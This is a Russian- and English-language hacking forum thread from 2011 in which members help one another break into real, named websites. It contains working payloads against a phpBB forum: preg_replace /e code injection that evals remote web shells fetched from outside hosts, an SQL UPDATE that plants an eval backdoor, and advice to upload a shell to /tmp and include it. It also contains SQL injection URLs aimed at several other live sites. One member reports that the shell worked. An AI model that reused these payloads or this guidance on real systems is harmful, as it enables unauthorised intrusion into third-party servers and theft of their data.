Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,254
    Likes Received:
    1,147
    Reputations:
    886
    залей шелл в тмп и инклуди, если так хочется
     
    _________________________
  2. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
    хочется, но инклуд здесь не прокатит
     
  3. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,254
    Likes Received:
    1,147
    Reputations:
    886
    что значит не прокатит?
    разясните

    copy('твой_шелл','/tmp/shell');
    include('/tmp/shell'); //локальный инклуд

    временно сможешь глянуть серв, пока сессия не устареет, а за это время успеешь найти вритабельную папку, или порутить серв если повезет
     
    _________________________
    #18683 Konqi, 19 Dec 2011
    Last edited: 19 Dec 2011
  4. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
    залить в тмп получилось
    потом пробую инклуд

    http://www.fauna-servis.ua/forum/profile.php?mode=editprofile&e=include%28%22/var/www/faunaservis/tmp/xxx.php%22%29;
    выдает
    Parse error: syntax error, unexpected $end in /var/www/faunaservis/fauna-servis.ua/forum/includes/usercp_register.php(825) : regexp code(1) : eval()'d code on line 1

    может конечно я что то не то делаю, якобы синтаксис не тот...

    к тому же директория темп не видна из инета...
     
  5. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,254
    Likes Received:
    1,147
    Reputations:
    886
    еще вариант eval-ить удаленно, eval(file_get_contents('шелл, без пхп тегов'));

    + посмотрите что там за ядро

    =\ поэтому и инклудим, а не открываем шелл по прямому адресу
     
    _________________________
  6. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
    ну да..

    eval тоже юзал, file_get_contents, d первую очередь пробовал... но увы...

    UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:file_get_contents("http://.narod.ru/wso2.txt")' WHERE user_id=2;

    выдало

    Parse error: syntax error, unexpected $end in /var/www/faunaservis/fauna-servis.ua/forum/includes/usercp_register.php(825) : regexp code on line 1

    Fatal error: preg_replace() [<a href='function.preg-replace'>function.preg-replace</a>]: Failed evaluating code: file_get_contents(\&quot;http://.narod.ru/wso2.txt\&quot;) in /var/www/faunaservis/fauna-servis.ua/forum/includes/usercp_register.php on line 825

    ядро
    Linux nvh103 2.6.32-5-openvz-amd64 #1 SMP Mon Oct 3 05:12:50 UTC 2011 x86_64

    там еще написано
    This server is protected with the Suhosin Patch 0.9.6.2
    подозреваю что не к добру это)
     
    #18686 547, 19 Dec 2011
    Last edited: 19 Dec 2011
  7. wkar

    wkar Elder - Старейшина

    Joined:
    18 Oct 2009
    Messages:
    211
    Likes Received:
    63
    Reputations:
    34
    _http://www.fauna-servis.ua/forum/profile.php?mode=editprofile&bb=eval(file_get_contents('http://la2evolution.com/w.txt'));
     
  8. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
    хочешь сказать что у тебя запустился шелл?
     
  9. wkar

    wkar Elder - Старейшина

    Joined:
    18 Oct 2009
    Messages:
    211
    Likes Received:
    63
    Reputations:
    34
    Да, только чуть-чуть поправил
    PHP:
    UPDATE faunaservis.phpbb_users SET user_sig_bbcode_uid='(.+)/e\0'user_sig='phpbb:eval(stripslashes($_REQUEST[bb]));' WHERE user_id=2;
    PS
    там даже папка на залив есть, шелл отправил в пм
     
    #18689 wkar, 19 Dec 2011
    Last edited: 19 Dec 2011
    3 people like this.
  10. lightangel

    lightangel New Member

    Joined:
    7 Nov 2011
    Messages:
    91
    Likes Received:
    3
    Reputations:
    -6
    Is this website vulnerable?

    Code:
    http://www.aminfans.com/products.php?p_id=-2
    Tried everything still, nothing works.
     
  11. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,037
    Likes Received:
    531
    Reputations:
    935
    i don't think so
     
    _________________________
  12. lightangel

    lightangel New Member

    Joined:
    7 Nov 2011
    Messages:
    91
    Likes Received:
    3
    Reputations:
    -6
    Thanks.

    Code:
    http://www.barigo.de/shop/front/category_detail.php3?language=l2%27&cat_id=4%27&cat2_id=15%27&item_id=.24%27
    Cannot get order by?
     
  13. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,052
    Likes Received:
    613
    Reputations:
    690
    2lightangel you yourself are not you ashamed? can all still try to read the manual about sql injections?
     
    _________________________
  14. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,037
    Likes Received:
    531
    Reputations:
    935
    http://forum.antichat.ru/thread43966.html
     
    _________________________
  15. Breetonia

    Breetonia New Member

    Joined:
    11 Dec 2011
    Messages:
    38
    Likes Received:
    1
    Reputations:
    0
    Напал на след статьи http://forum.antichat.ru/showthread.php?t=195037
    Непонятен вопрос обхода пробелов через магические скобки ))) -
    Code:
    ()
    Запросы вида - /script.php?id=(50)union(select(1),database(),2--+) вводят в ступор.

    Как это работает,там не объясняется.
     
  16. trololoman96

    trololoman96 Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    123
    Likes Received:
    34
    Reputations:
    55
    Тут походу используются под запросы, подробней по ссылки ниже.
    http://mysql.ru/docs/gruber/mg11.html
     
  17. nikp

    nikp Banned

    Joined:
    19 Sep 2008
    Messages:
    328
    Likes Received:
    591
    Reputations:
    764
    Скобки не магические, а круглые http://mysql.ru/docs/man/Parentheses.html

    Просто в некоторых случаях, рядом со скобками (как и с некоторыми другими символами, пример && || @) пробел не обязателен.
     
    #18697 nikp, 21 Dec 2011
    Last edited: 21 Dec 2011
  18. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,582
    Likes Received:
    173
    Reputations:
    75
    хелп, немогу подобрать количество полей
    PHP:
    http://logan.ru/faq.html?id=12'+union+select+1,2,3,4,5,6,7,8,9,10,12,13--+
    есть ли какойеибуть софт который может ето сделать?? потомучто вручную подбирать срехнутя можно
     
  19. wkar

    wkar Elder - Старейшина

    Joined:
    18 Oct 2009
    Messages:
    211
    Likes Received:
    63
    Reputations:
    34
    2qaz,
    Code:
    http://logan.ru/faq.html?id=9999+union+select+1,group_concat(0x3a,version(),user(),3,4,5,6,7,8--+
    http://forum.antichat.ru/showpost.php?p=2789336&postcount=15 неплохой софт для автоматического проведения инъекции.
     
    1 person likes this.
  20. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,582
    Likes Received:
    173
    Reputations:
    75
    а вот, ещо вопрос, есть сайт
    там вся инфа в таком виде
    ?????? ???? ????????? ???????????? ? ????? ??????? ??????????? ????????????? ?????? ????????. ????, ????????????? ?? ???? ????? ???

    и естественно

    из БД при sql-in тоже всё в таком виде, как быть? как в нормальном выде слить базу?
     
Loading...
Thread Status:
Not open for further replies.